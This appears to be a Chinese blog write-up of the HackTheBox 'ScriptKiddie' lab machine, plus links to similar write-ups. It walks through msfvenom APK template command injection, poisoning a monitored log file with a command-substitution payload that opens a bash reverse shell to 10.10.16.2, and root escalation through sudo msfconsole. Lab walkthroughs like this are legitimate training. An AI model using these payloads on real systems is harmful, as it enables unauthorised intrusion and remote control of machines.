HackTheBox | ScriptKiddie

原创 已于 2022-09-01 22:02:55 修改 · 300 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-04-22 09:36:22 首次发布
本文详细描述了一名Script Kiddie如何通过Nmap扫描发现开放端口,利用msfvenom生成恶意APK,植入Android设备并获取反弹shell。作者展示了从权限提升、日志利用到提权后的操作过程,包括检查用户账户、深入系统目录和使用自动化工具。

ScriptKiddie

nmap扫描,开放22、5000
image-20220419162651422
访问5000端口,页面belike:
image-20220419162858503
根据提示,使用msfvenom APK template command injection反弹shell。

使用msf生成msf.apk
image-20220419163806992
利用生成的msf.apk在目标网站上生成msfvenom木马,其中操作系统类型选Android,lhost设置为127.0.0.1
image-20220419163937989
本地开启监听,随后收到shell。
image-20220419164158222
检查/etc/passwd,发现出了kid这个用户外,还有pwn用户
image-20220419164310924
尝试进入/home/pwn,发现成功进入该目录。
image-20220419164758463
在脚本scanlosers.sh中看到利用了/home/kid/logs/hackers,起到相当于日志的作用,而这个文件权限特殊,属主是kid用户,属组是pwn组。
image-20220419164820016
在scanlosers.sh中执行命令时,使用cut进行了截取,所以写入hackers时需要将执行的反弹shell放在第三个字段。

echo 'a b $(bash -c "bash -i &>/dev/tcp/10.10.16.2/1234 0>&1")' > /home/kid/logs/hackers

成功反弹shell。
image-20220419165846772
sudo -l检查,发现可以利用msfconsole提权
image-20220419165923374
sudo打开msfconsole,进入irb模式,反弹shell
image-20220419171255597
image-20220419171316895

1205504)]

[外链图片转存中…(img-McJNA5rM-1650591205504)]

Hack The Box——ScriptKiddie
江左盟的博客
02-15 1万+
简介 信息收集 使用nmap扫描目标主机端口及服务信息,发现5000端口运行着Werkzeug httpd 0.16.1 (Python 3.8.5)服务,操作系统为Ubuntu,如图: 访问5000端口发现是简单的黑客工具页面,如图: 使用Google搜索发现Werkzeug Debug Shell远程代码执行漏洞,但是该靶机并不适用。使用该页面的nmap扫描127.0.0.1,发现目标主机运行Nmap 7.80版本,如图: 使用Google和exploit-db搜索该版本漏洞.
HackTheBox-------ScriptKiddie
CyhDl666的博客
04-11 328
文章目录题记信息收集 题记 第一次做渗透测试 有点兴奋~ 信息收集 namp 扫描ip地址 发现开放的端口 访问一下端口 是一个在线的nmap工具(好像看过类似的CTF题目…) 扫描一个ip地址试试 是Nmap的7.80版本 ...
HTB-ScriptKiddie
TA不懒,但还没有添加简介
09-18 359
HTB-ScriptKiddie
Hack The Box——OpenKeyS
江左盟的博客
08-22 1万+
目录 简介 信息收集 漏洞发现 登录绕过 漏洞利用 权限提升 总结 简介 靶机比较简单,通过目录扫描发现swp文件,分析文件发现auth.php源码和用户名,然后利用CVE-2019-19521绕过登录,接着伪造Cookie获取用户的SSH私钥,利用该文件登录目标主机,最后利用CVE-2019-19520/CVE-2019-19522成功提升至root权限。 信息收集 使用nmap快速扫描目标主机开放的端口和运行的服务,发现开启22和80端口,分别运行OpenSSH 8.1和OpenB
Hack The Box——Luanne
热门推荐
江左盟的博客
12-06 1万+
目录 简介 信息收集 漏洞发现 Lua代码注入 漏洞利用 权限提升 用户r.michaels的Shell 总结 简介 靶机偏CTF类型,评分才2.3,评分这么低是有原因的。总体思路是通过lua代码注入获得WebShell,然后利用CVE-2010-2320读取普通用户ssh私钥文件,从而获得普通用户权限,最后通过解密enc文件,利用.htpasswd文件中的密码获得root权限。 信息收集 使用Nmap对目标主机进行端口扫描及服务识别,发现目标主机开启22、80和9001端口,且80
Hack The Box——Feline
江左盟的博客
03-30 1万+
简介 信息收集 nmap 访问
vulnhub之Funbox: Scriptkiddie
qwweggfe的博客
08-29 420
靶机ip:192.168.181.155 kali IP : 192.168.181.129 首先进行IP扫描 然后我查看ip端口开启哪些服务 我们看见他开启了80端口,于是我们打开网页进行查看 于是我进行目录探测,看看他有没有给我们一些提示 gobuster dir -u http://192.168.181.155/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 于是我认为他们开...
靶机:Funbox: Scriptkiddie
weixin_50339323的博客
09-14 552
一、信息收集 1. 获取靶机IP (在扫描靶机IP过程中扫不到IP,更改下靶机的配置文件) 2. 扫描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 扫目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan扫描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 797
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
Nibbles - Hack the box
neal1991的专栏
03-17 690
IntroductionTarget: 10.10.10.75(OS: Linux) Kali linux: 10.10.16.44Information Enumera...
Hack the box: Bastion
neal1991的专栏
10-10 1566
介绍目标:10.10.10.134 (Windows)Kali:10.10.16.65In conclusion, Bastion is not a medium box...
Hack The Box - Access Writeup
qq_23026851的博客
01-23 1402
第一次尝试Hack The Box,在难度较低的Access上,前后花了有两天的时间,汗。收获还是很大,在此记录一下,以便后阅。 首先是获取user,通过nmap扫描,可以发现目标主机开了三个端口21(FTP),23(telnet),80(HTTP)。80端口是迷惑信息,先尝试利用FTP。 但是因为不知道登陆FTP的账号密码,这里也卡了很久TAT。后来才发现有anonymous登陆这种操作。上...
Hack The Box——ServMon
江左盟的博客
06-19 1042
简介 信息收集 使用 漏洞发现 漏洞利用 权限提升 总结
HackTheBox-Hackerman
网安星空
02-20 600
HackTheBox网站CTF靶场杂项(Misc)相关题目Hackerman,主要知识点为图片的隐写术。
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 8347
Hack The Box,一款有意思的渗透测试平台
Hack the box Oopsie
qq_41696858的博客
07-03 445
1.靶机IP 10.10.10.28,常规nmap -sC -sV 10.10.10.28扫端口,扫出22和80端口 2.打开浏览器,访问80端口,页面上没有啥,查看源码,找到/cdn-cgi/login,找到后台登录入口 3.登录,用户名 admin 密码没啥特别提示,尝试上一台靶机的密码,果然一样 4.后台四个模块,account模块管理账户信息,uploads上传文件 看见uploads,就知道找到了shell上传点,点开需要super_admin权限,通过抓包发现,其实是通过cookie里面的use
Hack The Box:Blue靶场
知柯信安
11-25 1519
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
HackTheBox-Jeeves
网安星空
01-10 731
HackTheBox 网站CTF靶场PWN相关题目Jeeves,主要知识点为缓冲区溢出
Python脚本Pynuke128: 探索Forkbomb的危险与教训
Pynuke128的标签揭示了几个关键知识点,包括编程语言Python、脚本小子(scriptkiddie,指的是那些没有深厚编程技能但能使用现成代码进行简单修改的人)、递归(recursion,Forkbomb的实现通常涉及递归调用)、128x64...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值